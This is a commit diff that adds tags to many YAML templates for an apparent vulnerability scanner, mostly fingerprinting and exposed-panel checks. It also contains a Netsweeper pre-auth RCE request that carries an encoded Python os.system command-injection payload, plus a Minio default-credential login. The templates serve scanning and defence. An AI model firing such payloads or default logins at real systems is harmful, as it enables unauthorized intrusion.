Coverage for all templates using tags
parent
576499034d
commit
bd24dc198e
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
|
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
|
||||||
reference: https://github.com/amartinsec/CVE-2020-12800
|
reference: https://github.com/amartinsec/CVE-2020-12800
|
||||||
|
tags: cve,cve2020,wordpress,wp-plugin
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -9,13 +9,15 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
|
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
|
||||||
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
|
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
|
||||||
|
additional-fields:
|
||||||
|
hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
# Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
|
|
||||||
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
|
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
|
||||||
- "{{BaseURL}}/webadmin/out"
|
- "{{BaseURL}}/webadmin/out"
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
|
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
|
||||||
|
|
||||||
|
|
|
@ -8,6 +8,7 @@ info:
|
||||||
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
|
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: medium
|
severity: medium
|
||||||
|
tags: cve,cve2021,xss,npm
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -4,23 +4,27 @@ info:
|
||||||
name: Minio Default Password
|
name: Minio Default Password
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
|
tags: default-login,minio
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/minio/webrpc"
|
- "{{BaseURL}}/minio/webrpc"
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
body: |
|
|
||||||
{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
|
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
|
||||||
|
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/minio/webrpc"
|
- "{{BaseURL}}/minio/webrpc"
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
body: |
|
|
||||||
{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}
|
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: prometheus-exposed-panel
|
id: prometheus-exposed-panel
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Prometheus.io exposed panel
|
name: Prometheus.io exposed panel
|
||||||
author: organiccrap
|
author: organiccrap
|
||||||
severity: low
|
severity: low
|
||||||
# usually runs on port http/9090
|
tags: panel,prometheus
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
@ -12,4 +14,4 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- <title>Prometheus Time Series Collection and Processing Server</title>
|
- '<title>Prometheus Time Series Collection and Processing Server</title>'
|
|
@ -4,7 +4,8 @@ info:
|
||||||
name: View Yii Debugger Information
|
name: View Yii Debugger Information
|
||||||
author: geeknik
|
author: geeknik
|
||||||
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
|
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
|
||||||
severity: info
|
severity: low
|
||||||
|
tags: yii,debug,exposure
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -16,11 +17,14 @@ requests:
|
||||||
- "{{BaseURL}}/sapi/debug/default/view"
|
- "{{BaseURL}}/sapi/debug/default/view"
|
||||||
|
|
||||||
redirects: true
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>Yii Debugger</title>"
|
- "<title>Yii Debugger</title>"
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: philippedelteil
|
author: philippedelteil
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
|
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
|
||||||
|
tags: exposure,shoppable,token
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: JTeles,pikpikcu
|
author: JTeles,pikpikcu
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
|
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
|
||||||
|
tags: misconfig,exposure,frontpage
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,18 +1,22 @@
|
||||||
id: artica-web-proxy-detect
|
id: artica-web-proxy-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Artica Web Proxy Detect
|
name: Artica Web Proxy Detect
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,artica,proxy
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/fw.login.php"
|
- "{{BaseURL}}/fw.login.php"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Welcome to the Artica Web Administration Interface"
|
- "Welcome to the Artica Web Administration Interface"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Basic auth detection
|
name: Basic auth detection
|
||||||
author: w4cky_
|
author: w4cky_
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,basic-auth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: BIG-IP Configuration Utility detected
|
name: BIG-IP Configuration Utility detected
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,bigip
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: joanbono
|
author: joanbono
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
|
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
|
||||||
|
tags: burp,tech
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: Cacti is a complete network graphing solution -- https://www.cacti.net/
|
description: Cacti is a complete network graphing solution -- https://www.cacti.net/
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,cacti
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: clockwork-php-page
|
id: clockwork-php-page
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Clockwork PHP page exposure
|
name: Clockwork PHP page exposure
|
||||||
author: organiccrap
|
author: organiccrap
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://twitter.com/damian_89_/status/1250721398747791360
|
reference: https://twitter.com/damian_89_/status/1250721398747791360
|
||||||
|
tags: tech,clockwork
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Detect Agentejo Cockpit
|
name: Detect Agentejo Cockpit
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,cockpit
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: dell-idrac6-detect
|
id: dell-idrac6-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Dell iDRAC6
|
name: Detect Dell iDRAC6
|
||||||
author: kophjager007
|
author: kophjager007
|
||||||
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,dell
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: dell-idrac7-detect
|
id: dell-idrac7-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Dell iDRAC7
|
name: Detect Dell iDRAC7
|
||||||
author: kophjager007
|
author: kophjager007
|
||||||
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,dell
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: dell-idrac8-detect
|
id: dell-idrac8-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Dell iDRAC8
|
name: Detect Dell iDRAC8
|
||||||
author: kophjager007
|
author: kophjager007
|
||||||
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,dell
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: dell-idrac9-detect
|
id: dell-idrac9-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Dell iDRAC9
|
name: Detect Dell iDRAC9
|
||||||
author: kophjager007
|
author: kophjager007
|
||||||
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,dell
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -10,6 +10,7 @@ info:
|
||||||
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
|
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
|
||||||
- https://github.com/devanshbatham/FavFreak
|
- https://github.com/devanshbatham/FavFreak
|
||||||
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
|
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
|
||||||
|
tags: tech,favicon
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,11 +5,13 @@ info:
|
||||||
author: organiccrap
|
author: organiccrap
|
||||||
severity: low
|
severity: low
|
||||||
reference: http://ghostlulz.com/google-exposed-firebase-database/
|
reference: http://ghostlulz.com/google-exposed-firebase-database/
|
||||||
|
tags: tech,firebase
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
|
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Google Bucket detection
|
name: Google Bucket detection
|
||||||
author: 0xTeles
|
author: 0xTeles
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,gstorage,google,bucket
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: GraphQL API Detection
|
name: GraphQL API Detection
|
||||||
author: NkxxkN,ELSFA7110
|
author: NkxxkN,ELSFA7110
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,graphql
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Detect Graylog REST API
|
name: Detect Graylog REST API
|
||||||
author: PR3R00T
|
author: PR3R00T
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,graylog
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: gunicorn-detect
|
id: gunicorn-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Gunicorn Server
|
name: Detect Gunicorn Server
|
||||||
author: joanbono
|
author: joanbono
|
||||||
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
|
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,gunicorn
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,8 +1,10 @@
|
||||||
id: harbor-detect
|
id: harbor-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Harbor Detect
|
name: Harbor Detect
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,harbor
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Detect Home Assistant
|
name: Detect Home Assistant
|
||||||
author: fabaff
|
author: fabaff
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,iot
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: milo2012
|
author: milo2012
|
||||||
severity: info
|
severity: info
|
||||||
description: Version of HP iLO
|
description: Version of HP iLO
|
||||||
|
tags: tech,ilo
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Jaspersoft detected
|
name: Jaspersoft detected
|
||||||
author: koti2
|
author: koti2
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,jaspersoft
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Jellyfin detected
|
name: Jellyfin detected
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,jellyfin
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -13,6 +14,8 @@ requests:
|
||||||
- "{{BaseURL}}/index.html"
|
- "{{BaseURL}}/index.html"
|
||||||
- "{{BaseURL}}/web/index.html"
|
- "{{BaseURL}}/web/index.html"
|
||||||
- "{{BaseURL}}/web/manifest.json"
|
- "{{BaseURL}}/web/manifest.json"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
@ -22,6 +25,7 @@ requests:
|
||||||
- "The Free Software Media System"
|
- "The Free Software Media System"
|
||||||
condition: or
|
condition: or
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -4,11 +4,13 @@ info:
|
||||||
name: Jolokia Version Disclosure
|
name: Jolokia Version Disclosure
|
||||||
author: mavericknerd,dwisiswant0
|
author: mavericknerd,dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,jolokia
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/jolokia/version'
|
- '{{BaseURL}}/jolokia/version'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
@ -17,6 +19,7 @@ requests:
|
||||||
- '"protocol":'
|
- '"protocol":'
|
||||||
- '"agent":'
|
- '"agent":'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Kibana Service Detection
|
name: Kibana Service Detection
|
||||||
author: petruknisme
|
author: petruknisme
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,kibana
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: The Cloud-Native API Gateway - https://github.com/Kong/kong
|
description: The Cloud-Native API Gateway - https://github.com/Kong/kong
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,kong
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: liferay-portal-detect
|
id: liferay-portal-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Liferay Portal Detection
|
name: Liferay Portal Detection
|
||||||
author: organiccrap,dwisiswant0
|
author: organiccrap,dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
|
reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
|
||||||
|
tags: tech,liferay
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,15 +1,11 @@
|
||||||
id: linkerd-badrule-detect
|
id: linkerd-badrule-detect
|
||||||
|
|
||||||
# Detect the Linkerd service by overriding the delegation table with an invalid
|
|
||||||
# rule, the presence of the service is indicated by either:
|
|
||||||
# - a "Via: .. linkerd .."
|
|
||||||
# - a "l5d-err" and/or a "l5d-success" header
|
|
||||||
# - a literal error in the body
|
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Linkerd detection via bad rule
|
name: Linkerd detection via bad rule
|
||||||
author: dudez
|
author: dudez
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,linkerd
|
||||||
|
reference: https://linkerd.io
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,8 +1,10 @@
|
||||||
id: lotus-domino-version
|
id: lotus-domino-version
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Lotus Domino Version Extractor
|
name: Lotus Domino Version Extractor
|
||||||
author: CasperGN
|
author: CasperGN
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,lotus
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: metabase-version-detect
|
id: metabase-version-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Metabase Version
|
name: Detect Metabase Version
|
||||||
author: revblock
|
author: revblock
|
||||||
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
|
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,metabase
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/auth/login"
|
- "{{BaseURL}}/auth/login"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: mrtg-detect
|
id: mrtg-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect MRTG
|
name: Detect MRTG
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
|
description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,mrtg
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Netsweeper WebAdmin detected
|
name: Netsweeper WebAdmin detected
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,netsweeper
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,9 +1,12 @@
|
||||||
id: nginx-version
|
id: nginx-version
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: nginx version detect
|
name: nginx version detect
|
||||||
author: philippedelteil
|
author: philippedelteil
|
||||||
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
|
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,nginx
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Apache NiFi detect
|
name: Apache NiFi detect
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,apache,nifi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -15,6 +16,7 @@ requests:
|
||||||
- "{{BaseURL}}/flow/registries"
|
- "{{BaseURL}}/flow/registries"
|
||||||
- "{{BaseURL}}/system-diagnostics"
|
- "{{BaseURL}}/system-diagnostics"
|
||||||
- "{{BaseURL}}/nifi-api/access/config"
|
- "{{BaseURL}}/nifi-api/access/config"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
@ -22,6 +24,7 @@ requests:
|
||||||
- "supportsLogin"
|
- "supportsLogin"
|
||||||
- "disconnectedNodeAcknowledged"
|
- "disconnectedNodeAcknowledged"
|
||||||
- "(aggregate|node)Snapshots?"
|
- "(aggregate|node)Snapshots?"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: oidc-detect
|
id: oidc-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect OpenID Connect provider
|
name: Detect OpenID Connect provider
|
||||||
author: jarijaas
|
author: jarijaas
|
||||||
severity: info
|
severity: info
|
||||||
description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
|
description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
|
||||||
|
tags: tech,oidc
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Detect OpenAM and OpenSSO
|
name: Detect OpenAM and OpenSSO
|
||||||
author: philippedelteil
|
author: philippedelteil
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,openam
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,8 +1,10 @@
|
||||||
id: pi-hole-detect
|
id: pi-hole-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: pi-hole detector
|
name: pi-hole detector
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,pihole
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -14,6 +16,7 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Pi-hole"
|
- "Pi-hole"
|
||||||
|
|
|
@ -1,9 +1,11 @@
|
||||||
id: prtg-detect
|
id: prtg-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect PRTG
|
name: Detect PRTG
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
|
description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,prtg
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
|
description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: tech,redmine
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Detect Amazon-S3 Bucket
|
name: Detect Amazon-S3 Bucket
|
||||||
author: melbadry9
|
author: melbadry9
|
||||||
severity: info
|
severity: info
|
||||||
|
tags: aws,s3,bucket,tech
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -1,16 +1,20 @@
|
||||||
id: shiro-detect
|
id: shiro-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Shiro Framework
|
name: Detect Shiro Framework
|
||||||
author: AresX
|
author: AresX
|
||||||
severity: info
|
severity: info
|
||||||
|
